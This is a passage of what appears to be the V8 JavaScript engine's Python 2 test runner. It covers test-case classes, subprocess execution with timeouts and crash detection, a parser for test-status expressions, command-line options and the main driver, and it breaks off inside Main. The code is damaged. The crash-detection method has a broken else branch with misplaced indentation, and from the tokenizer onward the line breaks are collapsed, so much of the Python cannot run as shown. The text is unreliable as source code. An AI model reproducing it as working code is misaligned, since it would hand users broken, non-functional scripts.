    self.stderr = stderr
    # Lazily filled by TestCase.DidFail (memoized pass/fail verdict).
    self.failed = None


class TestCase(object):
  """A single runnable test; suites subclass this and supply GetCommand etc."""

  def __init__(self, context, path, mode):
    self.path = path
    self.context = context
    # Wall-clock run time, filled in by the progress indicator after Run().
    self.duration = None
    self.mode = mode
  def IsNegative(self):
    # A negative test is expected to fail; subclasses override.
    return False

  def TestsIsolates(self):
    return False

  def CompareTime(self, other):
    # Sort descending by duration (slowest first).
    return cmp(other.duration, self.duration)

  def DidFail(self, output):
    """Return (and memoize on `output`) whether this run counts as a failure."""
    if output.failed is None:
      output.failed = self.IsFailureOutput(output)
    return output.failed

  def IsFailureOutput(self, output):
    return output.exit_code != 0

  def GetSource(self):
    return "(no source available)"

  def RunCommand(self, command):
    """Run `command` through the context's processor and wrap the result."""
    full_command = self.context.processor(command)
    output = Execute(full_command,
                     self.context,
                     self.context.GetTimeout(self, self.mode))
    self.Cleanup()
    return TestOutput(self,
                      full_command,
                      output,
                      self.context.store_unexpected_output)

  def BeforeRun(self):
    pass

  def AfterRun(self, result):
    pass

  def GetCustomFlags(self, mode):
    # None means "use the default FLAGS for this mode".
    return None

  def Run(self):
    """Run the test with Before/After hooks; convert any error to BreakNowException."""
    self.BeforeRun()
    result = None
    try:
      result = self.RunCommand(self.GetCommand())
    except:
      # NOTE(review): this sets terminate on the TestCase, but the terminate
      # flag the workers poll lives on the ProgressIndicator — this write
      # looks ineffective; the BreakNowException below is what stops the run.
      self.terminate = True
      raise BreakNowException("User pressed CTRL+C or IO went wrong")
    finally:
      self.AfterRun(result)
    return result

  def Cleanup(self):
    return


class TestOutput(object):
  """Pairs a TestCase with its CommandOutput and classifies the outcome."""

  def __init__(self, test, command, output, store_unexpected_output):
    self.test = test
    self.command = command
    self.output = output
    self.store_unexpected_output = store_unexpected_output

  def UnexpectedOutput(self):
    """True iff the observed outcome is not among the test's expected outcomes."""
    if self.HasCrashed():
      outcome = CRASH
    elif self.HasTimedOut():
      outcome = TIMEOUT
    elif self.HasFailed():
      outcome = FAIL
    else:
      outcome = PASS
    return not outcome in self.test.outcomes

  def HasPreciousOutput(self):
    # Unexpected output whose temp files should be kept for inspection.
    return self.UnexpectedOutput() and self.store_unexpected_output

  def HasCrashed(self):
    if utils.IsWindows():
      # High bit set without the 0x3FFFFF00 mask bits indicates an NT
      # status-code style crash exit on Windows.
      return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
    else:
      # Timed out tests will have exit_code -signal.SIGTERM.
    if self.output.timed_out:
      return False
    # Killed by any signal except SIGABRT counts as a crash (SIGABRT is a
    # deliberate abort, classified as a plain failure).
    return self.output.exit_code < 0 and \
           self.output.exit_code != -signal.SIGABRT

  def HasTimedOut(self):
    return self.output.timed_out

  def HasFailed(self):
    # Negative tests invert the verdict: they pass when execution fails.
    execution_failed = self.test.DidFail(self.output)
    if self.test.IsNegative():
      return not execution_failed
    else:
      return execution_failed


def KillProcessWithID(pid):
  """Forcibly terminate `pid` (and, on Windows, its child tree)."""
  if utils.IsWindows():
    os.popen('taskkill /T /F /PID %d' % pid)
  else:
    os.kill(pid, signal.SIGTERM)


# Polling backoff for RunProcess: start fast, grow geometrically, cap.
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25

SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h


def Win32SetErrorMode(mode):
  """Set the Win32 process error mode; return the previous mode.

  Returns SEM_INVALID_VALUE when ctypes is unavailable (non-Windows or
  stripped Python), in which case nothing was changed.
  """
  prev_error_mode = SEM_INVALID_VALUE
  try:
    import ctypes
    prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode)
  except ImportError:
    pass
  return prev_error_mode


def RunProcess(context, timeout, args, **rest):
  """Spawn `args` as a subprocess and poll it until exit or `timeout` seconds.

  Returns (process, exit_code, timed_out). Extra keyword args (stdout/stderr
  fds etc.) are forwarded to subprocess.Popen.
  """
  if context.verbose:
    print "#", " ".join(args)
  popen_args = args
  prev_error_mode = SEM_INVALID_VALUE
  if utils.IsWindows():
    popen_args = subprocess.list2cmdline(args)
    if context.suppress_dialogs:
      # Try to change the error mode to avoid dialogs on fatal errors. Don't
      # touch any existing error mode flags by merging the existing error mode.
      # See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
      error_mode = SEM_NOGPFAULTERRORBOX
      prev_error_mode = Win32SetErrorMode(error_mode)
      Win32SetErrorMode(error_mode | prev_error_mode)
  process = subprocess.Popen(
    shell = utils.IsWindows(),
    args = popen_args,
    **rest
  )
  # Restore the saved error mode now that the child has inherited ours.
  if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
    Win32SetErrorMode(prev_error_mode)
  # Compute the end time - if the process crosses this limit we
  # consider it timed out.
  if timeout is None:
    end_time = None
  else:
    end_time = time.time() + timeout
  timed_out = False
  # Repeatedly check the exit code from the process in a
  # loop and keep track of whether or not it times out.
  exit_code = None
  sleep_time = INITIAL_SLEEP_TIME
  while exit_code is None:
    if (not end_time is None) and (time.time() >= end_time):
      # Kill the process and wait for it to exit.
      KillProcessWithID(process.pid)
      exit_code = process.wait()
      timed_out = True
    else:
      # Poll with geometric backoff up to MAX_SLEEP_TIME.
      exit_code = process.poll()
      time.sleep(sleep_time)
      sleep_time = sleep_time * SLEEP_TIME_FACTOR
      if sleep_time > MAX_SLEEP_TIME:
        sleep_time = MAX_SLEEP_TIME
  return (process, exit_code, timed_out)


def PrintError(str):
  """Write a line to stderr."""
  sys.stderr.write(str)
  sys.stderr.write('\n')


def CheckedUnlink(name):
  """Unlink `name`, retrying with growing delays; log the last error on give-up."""
  # On Windows, when run with -jN in parallel processes,
  # OS often fails to unlink the temp file. Not sure why.
  # Need to retry.
  # Idea from https://bugs.webkit.org/attachment.cgi?id=75982&action=prettypatch
  retry_count = 0
  while retry_count < 30:
    try:
      os.unlink(name)
      return
    except OSError, e:
      retry_count += 1
      time.sleep(retry_count * 0.1)
  PrintError("os.unlink() " + str(e))


def Execute(args, context, timeout=None):
  """Run `args`, capturing stdout/stderr via temp files; return CommandOutput."""
  (fd_out, outname) = tempfile.mkstemp()
  (fd_err, errname) = tempfile.mkstemp()
  (process, exit_code, timed_out) = RunProcess(
    context,
    timeout,
    args = args,
    stdout = fd_out,
    stderr = fd_err,
  )
  os.close(fd_out)
  os.close(fd_err)
  output = file(outname).read()
  errors = file(errname).read()
  CheckedUnlink(outname)
  CheckedUnlink(errname)
  return CommandOutput(exit_code, timed_out, output, errors)


def ExecuteNoCapture(args, context, timeout=None):
  """Run `args` with output going straight to the console (used for builds)."""
  (process, exit_code, timed_out) = RunProcess(
    context,
    timeout,
    args = args,
  )
  return CommandOutput(exit_code, False, "", "")


def CarCdr(path):
  """Split a path list into (head, tail); (None, []) for an empty list."""
  if len(path) == 0:
    return (None, [ ])
  else:
    return (path[0], path[1:])


# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[],
                 ['--stress-opt', '--always-opt'],
                 ['--nocrankshaft']]


class TestConfiguration(object):
  """Base class for a suite's testcfg.py configuration object."""

  def __init__(self, context, root):
    self.context = context
    self.root = root

  def Contains(self, path, file):
    """True iff the pattern list `path` is a prefix-match of `file`."""
    if len(path) > len(file):
      return False
    for i in xrange(len(path)):
      if not path[i].match(file[i]):
        return False
    return True

  def GetTestStatus(self, sections, defs):
    pass

  def VariantFlags(self):
    return VARIANT_FLAGS


class TestSuite(object):
  """Minimal named node in the test-suite tree."""

  def __init__(self, name):
    self.name = name

  def GetName(self):
    return self.name


class TestRepository(TestSuite):
  """A suite backed by a directory containing a testcfg.py module."""

  def __init__(self, path):
    normalized_path = abspath(path)
    super(TestRepository, self).__init__(basename(normalized_path))
    self.path = normalized_path
    self.is_loaded = False
    self.config = None

  def GetConfiguration(self, context):
    """Lazily import testcfg.py from this suite's directory (loaded once)."""
    if self.is_loaded:
      return self.config
    self.is_loaded = True
    file = None
    try:
      (file, pathname, description) = imp.find_module('testcfg', [ self.path ])
      module = imp.load_module('testcfg', file, pathname, description)
      self.config = module.GetConfiguration(context, self.path)
    finally:
      if file:
        file.close()
    return self.config

  def GetBuildRequirements(self, path, context):
    return self.GetConfiguration(context).GetBuildRequirements()

  def DownloadData(self, context):
    # DownloadData is optional on configurations; call it only if present.
    config = self.GetConfiguration(context)
    if 'DownloadData' in dir(config):
      config.DownloadData()

  def AddTestsToList(self, result, current_path, path, context, mode):
    """Append this suite's tests, once per variant-flag combination."""
    config = self.GetConfiguration(context)
    for v in config.VariantFlags():
      tests = config.ListTests(current_path, path, mode, v)
      for t in tests: t.variant_flags = v
      result += tests

  def GetTestStatus(self, context, sections, defs):
    self.GetConfiguration(context).GetTestStatus(sections, defs)


class LiteralTestSuite(TestSuite):
  """The root suite: a fixed list of child suites, filtered by path patterns."""

  def __init__(self, tests):
    super(LiteralTestSuite, self).__init__('root')
    self.tests = tests

  def GetBuildRequirements(self, path, context):
    (name, rest) = CarCdr(path)
    result = [ ]
    for test in self.tests:
      if not name or name.match(test.GetName()):
        result += test.GetBuildRequirements(rest, context)
    return result

  def DownloadData(self, path, context):
    (name, rest) = CarCdr(path)
    for test in self.tests:
      if not name or name.match(test.GetName()):
        test.DownloadData(context)

  def ListTests(self, current_path, path, context, mode, variant_flags):
    (name, rest) = CarCdr(path)
    result = [ ]
    for test in self.tests:
      test_name = test.GetName()
      if not name or name.match(test_name):
        full_path = current_path + [test_name]
        test.AddTestsToList(result, full_path, path, context, mode)
    return result

  def GetTestStatus(self, context, sections, defs):
    for test in self.tests:
      test.GetTestStatus(context, sections, defs)


# Per-mode shell suffix, default VM flags, and timeout multiplier.
SUFFIX = {
    'debug'   : '_g',
    'release' : '' }
FLAGS = {
    'debug'   : ['--nobreak-on-abort', '--nodead-code-elimination',
                 '--nofold-constants', '--enable-slow-asserts',
                 '--debug-code', '--verify-heap'],
    'release' : ['--nobreak-on-abort', '--nodead-code-elimination',
                 '--nofold-constants']}
TIMEOUT_SCALEFACTOR = {
    'debug'   : 4,
    'release' : 1 }


class Context(object):
  """Immutable bag of run-wide settings shared by all test cases."""

  def __init__(self, workspace, buildspace, verbose, vm, timeout, processor,
               suppress_dialogs, store_unexpected_output):
    self.workspace = workspace
    self.buildspace = buildspace
    self.verbose = verbose
    self.vm_root = vm
    self.timeout = timeout
    self.processor = processor
    self.suppress_dialogs = suppress_dialogs
    self.store_unexpected_output = store_unexpected_output

  def GetVm(self, mode):
    """Path to the shell binary for `mode` ('.exe' appended on Windows)."""
    name = self.vm_root + SUFFIX[mode]
    if utils.IsWindows() and not name.endswith('.exe'):
      name = name + '.exe'
    return name

  def GetVmCommand(self, testcase, mode):
    return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode)

  def GetVmFlags(self, testcase, mode):
    # Test-specific custom flags override the per-mode defaults.
    flags = testcase.GetCustomFlags(mode)
    if flags is None:
      flags = FLAGS[mode]
    return testcase.variant_flags + flags

  def GetTimeout(self, testcase, mode):
    # Stress-opt runs get 4x extra headroom on top of the mode scale factor.
    result = self.timeout * TIMEOUT_SCALEFACTOR[mode]
    if '--stress-opt' in self.GetVmFlags(testcase, mode):
      return result * 4
    else:
      return result


def RunTestCases(cases_to_run, progress, tasks):
  """Run cases under the named progress indicator; return its success flag."""
  progress = PROGRESS_INDICATORS[progress](cases_to_run)
  result = 0
  try:
    result = progress.Run(tasks)
  except Exception, e:
    print "\n", e
  return result


def BuildRequirements(context, requirements, mode, scons_flags):
  """Invoke scons to build the test prerequisites; True on success."""
  command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)]
                  + requirements
                  + scons_flags)
  output = ExecuteNoCapture(command_line, context)
  return output.exit_code == 0


# -------------------------------------------
# --- T e s t   C o n f i g u r a t i o n ---
# -------------------------------------------


# Outcome names used in .status files and outcome expressions.
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'


class Expression(object):
  """Abstract node of a parsed .status-file condition expression."""
  pass


class Constant(Expression):

  def __init__(self, value):
    self.value = value

  def Evaluate(self, env, defs):
    return self.value


class Variable(Expression):
  """A $variable reference, resolved against the evaluation environment."""

  def __init__(self, name):
    self.name = name

  def GetOutcomes(self, env, defs):
    if self.name in env: return ListSet([env[self.name]])
    else: return Nothing()

  def Evaluate(self, env, defs):
    return env[self.name]


class Outcome(Expression):
  """A bare identifier: either a named definition or a literal outcome."""

  def __init__(self, name):
    self.name = name

  def GetOutcomes(self, env, defs):
    if self.name in defs:
      return defs[self.name].GetOutcomes(env, defs)
    else:
      return ListSet([self.name])


class Set(object):
  """Abstract outcome set supporting Intersect/Union/IsEmpty."""
  pass


class ListSet(Set):
  """Concrete outcome set backed by a plain list."""

  def __init__(self, elms):
    self.elms = elms

  def __str__(self):
    return "ListSet%s" % str(self.elms)

  def Intersect(self, that):
    # Delegate to the other operand when it is a special set (Everything/Nothing).
    if not isinstance(that, ListSet):
      return that.Intersect(self)
    return ListSet([ x for x in self.elms if x in that.elms ])

  def Union(self, that):
    if not isinstance(that, ListSet):
      return that.Union(self)
    return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])

  def IsEmpty(self):
    return len(self.elms) == 0


class Everything(Set):
  """The universal set: identity for Intersect, absorbing for Union."""

  def Intersect(self, that):
    return that

  def Union(self, that):
    return self

  def IsEmpty(self):
    return False


class Nothing(Set):
  """The empty set: absorbing for Intersect, identity for Union."""

  def Intersect(self, that):
    return self

  def Union(self, that):
    return that

  def IsEmpty(self):
    return True


class Operation(Expression):
  """Binary operator node: '||', ',', '&&', '==', '!=' or 'if'."""

  def __init__(self, left, op, right):
    self.left = left
    self.op = op
    self.right = right

  def Evaluate(self, env, defs):
    # ',' is an alias for '||'.
    if self.op == '||' or self.op == ',':
      return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
    elif self.op == 'if':
      # 'if' only makes sense for outcome computation, never as a boolean.
      return False
    elif self.op == '==':
      inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
      return not inter.IsEmpty()
    elif self.op == '!=':
      inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
      return inter.IsEmpty()
    else:
      assert self.op == '&&'
      return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)

  def GetOutcomes(self, env, defs):
    if self.op == '||' or self.op == ',':
      return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
    elif self.op == 'if':
      # 'a if b': outcomes of a when condition b holds, otherwise none.
      if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
      else: return Nothing()
    else:
      assert self.op == '&&'
      return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))


def IsAlpha(str):
  """True iff `str` consists only of letters, digits and underscores."""
  for char in str:
    if not (char.isalpha() or char.isdigit() or char == '_'):
      return False
  return True


class Tokenizer(object):
  """A simple string tokenizer that chops expressions into variables,
  parens and operators"""

  def __init__(self, expr):
    self.index = 0
    self.expr = expr
    self.length = len(expr)
    self.tokens = None

  def Current(self, length = 1):
    # Returns "" when fewer than `length` characters remain.
    if not self.HasMore(length): return ""
    return self.expr[self.index:self.index+length]

  def HasMore(self, length = 1):
    return self.index < self.length + (length - 1)

  def Advance(self, count = 1):
    self.index = self.index + count

  def AddToken(self, token):
    self.tokens.append(token)

  def SkipSpaces(self):
    while self.HasMore() and self.Current().isspace():
      self.Advance()

  def Tokenize(self):
    """Scan the whole expression; return the token list or None on bad input."""
    self.tokens = [ ]
    while self.HasMore():
      self.SkipSpaces()
      if not self.HasMore():
        return None
      if self.Current() == '(':
        self.AddToken('(')
        self.Advance()
      elif self.Current() == ')':
        self.AddToken(')')
        self.Advance()
      elif self.Current() == '$':
        self.AddToken('$')
        self.Advance()
      elif self.Current() == ',':
        self.AddToken(',')
        self.Advance()
      elif IsAlpha(self.Current()):
        # Accumulate a full identifier token.
        buf = ""
        while self.HasMore() and IsAlpha(self.Current()):
          buf += self.Current()
self.Advance() self.AddToken(buf) elif self.Current(2) == '&&': self.AddToken('&&') self.Advance(2) elif self.Current(2) == '||': self.AddToken('||') self.Advance(2) elif self.Current(2) == '==': self.AddToken('==') self.Advance(2) elif self.Current(2) == '!=': self.AddToken('!=') self.Advance(2) else: return None return self.tokens class Scanner(object): """A simple scanner that can serve out tokens from a given list""" def __init__(self, tokens): self.tokens = tokens self.length = len(tokens) self.index = 0 def HasMore(self): return self.index < self.length def Current(self): return self.tokens[self.index] def Advance(self): self.index = self.index + 1 def ParseAtomicExpression(scan): if scan.Current() == "true": scan.Advance() return Constant(True) elif scan.Current() == "false": scan.Advance() return Constant(False) elif IsAlpha(scan.Current()): name = scan.Current() scan.Advance() return Outcome(name.lower()) elif scan.Current() == '$': scan.Advance() if not IsAlpha(scan.Current()): return None name = scan.Current() scan.Advance() return Variable(name.lower()) elif scan.Current() == '(': scan.Advance() result = ParseLogicalExpression(scan) if (not result) or (scan.Current() != ')'): return None scan.Advance() return result else: return None BINARIES = ['==', '!='] def ParseOperatorExpression(scan): left = ParseAtomicExpression(scan) if not left: return None while scan.HasMore() and (scan.Current() in BINARIES): op = scan.Current() scan.Advance() right = ParseOperatorExpression(scan) if not right: return None left = Operation(left, op, right) return left def ParseConditionalExpression(scan): left = ParseOperatorExpression(scan) if not left: return None while scan.HasMore() and (scan.Current() == 'if'): scan.Advance() right = ParseOperatorExpression(scan) if not right: return None left = Operation(left, 'if', right) return left LOGICALS = ["&&", "||", ","] def ParseLogicalExpression(scan): left = ParseConditionalExpression(scan) if not left: return None while 
scan.HasMore() and (scan.Current() in LOGICALS): op = scan.Current() scan.Advance() right = ParseConditionalExpression(scan) if not right: return None left = Operation(left, op, right) return left def ParseCondition(expr): """Parses a logical expression into an Expression object""" tokens = Tokenizer(expr).Tokenize() if not tokens: print "Malformed expression: '%s'" % expr return None scan = Scanner(tokens) ast = ParseLogicalExpression(scan) if not ast: print "Malformed expression: '%s'" % expr return None if scan.HasMore(): print "Malformed expression: '%s'" % expr return None return ast class ClassifiedTest(object): def __init__(self, case, outcomes): self.case = case self.outcomes = outcomes def TestsIsolates(self): return self.case.TestsIsolates() class Configuration(object): """The parsed contents of a configuration file""" def __init__(self, sections, defs): self.sections = sections self.defs = defs def ClassifyTests(self, cases, env): sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)] all_rules = reduce(list.__add__, [s.rules for s in sections], []) unused_rules = set(all_rules) result = [ ] all_outcomes = set([]) for case in cases: matches = [ r for r in all_rules if r.Contains(case.path) ] outcomes = set([]) for rule in matches: outcomes = outcomes.union(rule.GetOutcomes(env, self.defs)) unused_rules.discard(rule) if not outcomes: outcomes = [PASS] case.outcomes = outcomes all_outcomes = all_outcomes.union(outcomes) result.append(ClassifiedTest(case, outcomes)) return (result, list(unused_rules), all_outcomes) class Section(object): """A section of the configuration file. 
Sections are enabled or disabled prior to running the tests, based on their conditions""" def __init__(self, condition): self.condition = condition self.rules = [ ] def AddRule(self, rule): self.rules.append(rule) class Rule(object): """A single rule that specifies the expected outcome for a single test.""" def __init__(self, raw_path, path, value): self.raw_path = raw_path self.path = path self.value = value def GetOutcomes(self, env, defs): set = self.value.GetOutcomes(env, defs) assert isinstance(set, ListSet) return set.elms def Contains(self, path): if len(self.path) > len(path): return False for i in xrange(len(self.path)): if not self.path[i].match(path[i]): return False return True HEADER_PATTERN = re.compile(r'\[([^]]+)\]') RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)') DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$') PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$') def ReadConfigurationInto(path, sections, defs): current_section = Section(Constant(True)) sections.append(current_section) prefix = [] for line in utils.ReadLinesFrom(path): header_match = HEADER_PATTERN.match(line) if header_match: condition_str = header_match.group(1).strip() condition = ParseCondition(condition_str) new_section = Section(condition) sections.append(new_section) current_section = new_section continue rule_match = RULE_PATTERN.match(line) if rule_match: path = prefix + SplitPath(rule_match.group(1).strip()) value_str = rule_match.group(2).strip() value = ParseCondition(value_str) if not value: return False current_section.AddRule(Rule(rule_match.group(1), path, value)) continue def_match = DEF_PATTERN.match(line) if def_match: name = def_match.group(1).lower() value = ParseCondition(def_match.group(2).strip()) if not value: return False defs[name] = value continue prefix_match = PREFIX_PATTERN.match(line) if prefix_match: prefix = SplitPath(prefix_match.group(1).strip()) continue print "Malformed line: '%s'." 
% line return False return True # --------------- # --- M a i n --- # --------------- ARCH_GUESS = utils.GuessArchitecture() TIMEOUT_DEFAULT = 60; def BuildOptions(): result = optparse.OptionParser() result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)", default='release') result.add_option("-v", "--verbose", help="Verbose output", default=False, action="store_true") result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons", default=[], action="append") result.add_option("-p", "--progress", help="The style of progress indicator (verbose, dots, color, mono)", choices=PROGRESS_INDICATORS.keys(), default="mono") result.add_option("--no-build", help="Don't build requirements", default=False, action="store_true") result.add_option("--build-only", help="Only build requirements, don't run the tests", default=False, action="store_true") result.add_option("--build-system", help="Build system in use (scons or gyp)", default='scons') result.add_option("--report", help="Print a summary of the tests to be run", default=False, action="store_true") result.add_option("--download-data", help="Download missing test suite data", default=False, action="store_true") result.add_option("-s", "--suite", help="A test suite", default=[], action="append") result.add_option("-t", "--timeout", help="Timeout in seconds", default=-1, type="int") result.add_option("--arch", help='The architecture to run tests for', default='none') result.add_option("--snapshot", help="Run the tests with snapshot turned on", default=False, action="store_true") result.add_option("--simulator", help="Run tests with architecture simulator", default='none') result.add_option("--special-command", default=None) result.add_option("--valgrind", help="Run tests through valgrind", default=False, action="store_true") result.add_option("--cat", help="Print the source of the tests", default=False, action="store_true") result.add_option("--warn-unused", help="Report 
unused rules", default=False, action="store_true") result.add_option("-j", help="The number of parallel tasks to run", default=1, type="int") result.add_option("--time", help="Print timing information after running", default=False, action="store_true") result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests", dest="suppress_dialogs", default=True, action="store_true") result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests", dest="suppress_dialogs", action="store_false") result.add_option("--mips-arch-variant", help="mips architecture variant: mips32r1/mips32r2", default="mips32r2"); result.add_option("--shell", help="Path to V8 shell", default="d8") result.add_option("--isolates", help="Whether to test isolates", default=False, action="store_true") result.add_option("--store-unexpected-output", help="Store the temporary JS files from tests that fails", dest="store_unexpected_output", default=True, action="store_true") result.add_option("--no-store-unexpected-output", help="Deletes the temporary JS files from tests that fails", dest="store_unexpected_output", action="store_false") result.add_option("--stress-only", help="Only run tests with --always-opt --stress-opt", default=False, action="store_true") result.add_option("--nostress", help="Don't run crankshaft --always-opt --stress-op test", default=False, action="store_true") result.add_option("--shard-count", help="Split testsuites into this number of shards", default=1, type="int") result.add_option("--shard-run", help="Run this shard from the split up tests.", default=1, type="int") result.add_option("--noprof", help="Disable profiling support", default=False) return result def ProcessOptions(options): global VERBOSE VERBOSE = options.verbose options.mode = options.mode.split(',') for mode in options.mode: if not mode in ['debug', 'release']: print "Unknown mode %s" % mode return False if options.simulator != 'none': # Simulator argument was 
set. Make sure arch and simulator agree. if options.simulator != options.arch: if options.arch == 'none': options.arch = options.simulator else: print "Architecture %s does not match sim %s" %(options.arch, options.simulator) return False # Ensure that the simulator argument is handed down to scons. options.scons_flags.append("simulator=" + options.simulator) else: # If options.arch is not set by the command line and no simulator setting # was found, set the arch to the guess. if options.arch == 'none': options.arch = ARCH_GUESS options.scons_flags.append("arch=" + options.arch) # Simulators are slow, therefore allow a longer default timeout. if options.timeout == -1: if options.arch in ['android', 'arm', 'mipsel']: options.timeout = 2 * TIMEOUT_DEFAULT; else: options.timeout = TIMEOUT_DEFAULT; if options.snapshot: options.scons_flags.append("snapshot=on") global VARIANT_FLAGS if options.mips_arch_variant: options.scons_flags.append("mips_arch_variant=" + options.mips_arch_variant) if options.stress_only: VARIANT_FLAGS = [['--stress-opt', '--always-opt']] if options.nostress: VARIANT_FLAGS = [[],['--nocrankshaft']] if options.shell.endswith("d8"): if options.special_command: options.special_command += " --test" else: options.special_command = "@ --test" if options.noprof: options.scons_flags.append("prof=off") options.scons_flags.append("profilingsupport=off") if options.build_system == 'gyp': if options.build_only: print "--build-only not supported for gyp, please build manually." 
options.build_only = False return True def DoSkip(case): return (SKIP in case.outcomes) or (SLOW in case.outcomes) REPORT_TEMPLATE = """\ Total: %(total)i tests * %(skipped)4d tests will be skipped * %(timeout)4d tests are expected to timeout sometimes * %(nocrash)4d tests are expected to be flaky but not crash * %(pass)4d tests are expected to pass * %(fail_ok)4d tests are expected to fail that we won't fix * %(fail)4d tests are expected to fail that we should fix\ """ def PrintReport(cases): def IsFlaky(o): return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o) def IsFailOk(o): return (len(o) == 2) and (FAIL in o) and (OKAY in o) unskipped = [c for c in cases if not DoSkip(c)] print REPORT_TEMPLATE % { 'total': len(cases), 'skipped': len(cases) - len(unskipped), 'timeout': len([t for t in unskipped if TIMEOUT in t.outcomes]), 'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]), 'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]), 'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]), 'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]]) } class Pattern(object): def __init__(self, pattern): self.pattern = pattern self.compiled = None def match(self, str): if not self.compiled: pattern = "^" + self.pattern.replace('*', '.*') + "$" self.compiled = re.compile(pattern) return self.compiled.match(str) def __str__(self): return self.pattern def SplitPath(s): stripped = [ c.strip() for c in s.split('/') ] return [ Pattern(s) for s in stripped if len(s) > 0 ] def GetSpecialCommandProcessor(value): if (not value) or (value.find('@') == -1): def ExpandCommand(args): return args return ExpandCommand else: pos = value.find('@') import urllib import shlex prefix = shlex.split(urllib.unquote(value[:pos])) suffix = shlex.split(urllib.unquote(value[pos+1:])) def ExpandCommand(args): return prefix + args + suffix return ExpandCommand BUILT_IN_TESTS = ['mjsunit', 'cctest', 'message', 'preparser'] def 
GetSuites(test_root): def IsSuite(path): return isdir(path) and exists(join(path, 'testcfg.py')) return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ] def FormatTime(d): millis = round(d * 1000) % 1000 return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis) def ShardTests(tests, options): if options.shard_count < 2: return tests if options.shard_run < 1 or options.shard_run > options.shard_count: print "shard-run not a valid number, should be in [1:shard-count]" print "defaulting back to running all tests" return tests count = 0 shard = [] for test in tests: if count % options.shard_count == options.shard_run - 1: shard.append(test) count += 1 return shard def Main(): parser = BuildOptions() (options, args) = parser.parse_args() if not ProcessOptions(options): parser.print_help() return 1 workspace = abspath(join(dirname(sys.argv[0]), '..')) suites = GetSuites(join(workspace, 'test')) repositories = [TestRepository(join(workspace, 'test', name)) for name in suites] repositories += [TestRepository(a) for a in options.suite] root = LiteralTestSuite(repositories) if len(args) == 0: paths = [SplitPath(t) for t in BUILT_IN_TESTS] else: paths = [ ] for arg in args: path = SplitPath(arg) paths.append(path) # Check for --valgrind option. If enabled, we overwrite the special # command flag with a command that uses the run-valgrind.py script. 
if options.valgrind: run_valgrind = join(workspace, "tools", "run-valgrind.py") options.special_command = "python -u " + run_valgrind + " @" if options.build_system == 'gyp': SUFFIX['debug'] = '' shell = abspath(options.shell) buildspace = dirname(shell) context = Context(workspace, buildspace, VERBOSE, shell, options.timeout, GetSpecialCommandProcessor(options.special_command), options.suppress_dialogs, options.store_unexpected_output) # First build the required targets if not options.no_build: reqs = [ ] for path in paths: reqs += root.GetBuildRequirements(path, context) reqs = list(set(reqs)) if len(reqs) > 0: if options.j != 1: options.scons_flags += ['-j', str(options.j)] if not BuildRequirements(context, reqs, options.mode, options.scons_flags): return 1 # Just return if we are only building the targets for running the tests. if options.build_only: return 0 # Get status for tests sections = [ ] defs = { } root.GetTestStatus(context, sections, defs) config = Configuration(sections, defs) # Download missing test suite data if requested. 
if options.download_data: for path in paths: root.DownloadData(path, context) # List the tests all_cases = [ ] all_unused = [ ] unclassified_tests = [ ] globally_unused_rules = None for path in paths: for mode in options.mode: env = { 'mode': mode, 'system': utils.GuessOS(), 'arch': options.arch, 'simulator': options.simulator, 'isolates': options.isolates } test_list = root.ListTests([], path, context, mode, []) unclassified_tests += test_list (cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env) if globally_unused_rules is None: globally_unused_rules = set(unused_rules) else: globally_unused_rules = globally_unused_rules.intersection(unused_rules) all_cases += ShardTests(cases, options) all_unused.append(unused_rules) if options.cat: visited = set() for test in unclassified_tests: key = tuple(test.path) if key in visited: continue visited.add(key) print "--- begin source: %s ---" % test.GetLabel() source = test.GetSource().strip() print source print "--- end source: %s ---" % test.GetLabel() return 0 if options.warn_unused: for rule in globally_unused_rules: print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path]) if not options.isolates: all_cases = [c for c in all_cases if not c.TestsIsolates()] if options.report: PrintReport(all_cases) result = None cases_to_run = [ c for c in all_cases if not DoSkip(c) ] if len(cases_to_run) == 0: print "No tests to run." return 0 else: try: start = time.time() if RunTestCases(cases_to_run, options.progress, options.j): result = 0 else: result = 1 duration = time.time() - start except KeyboardInterrupt: print "Interrupted" return 1 if options.time: # Write the times to stderr to make it easy to separate from the # test output. 
